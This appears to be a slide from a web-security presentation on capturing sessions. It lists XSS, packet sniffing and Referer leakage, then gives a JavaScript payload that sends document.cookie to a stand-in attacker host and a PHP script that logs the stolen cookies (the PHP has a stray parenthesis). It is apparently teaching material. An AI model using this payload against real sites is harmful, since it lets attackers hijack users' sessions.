Sessions :: Capture

Sessions :: Capture

Sessions :: Capture

XSS
Sniffing - tcpdump ethereal etc.
Leakage REFERRER Header - URL Based (remote avatar icons)

        
              <script>
            
              var x = new Image(); x.src = 'http://badguy.net/x.php?steal=' + document.cookie;
            
              </script>

        
              $fp = fopen ('stolen_cookies.log',
              'a'));
            
              fwrite ($fp, $_SERVER["REQUEST_URI"]);
            
              fclose ($fp);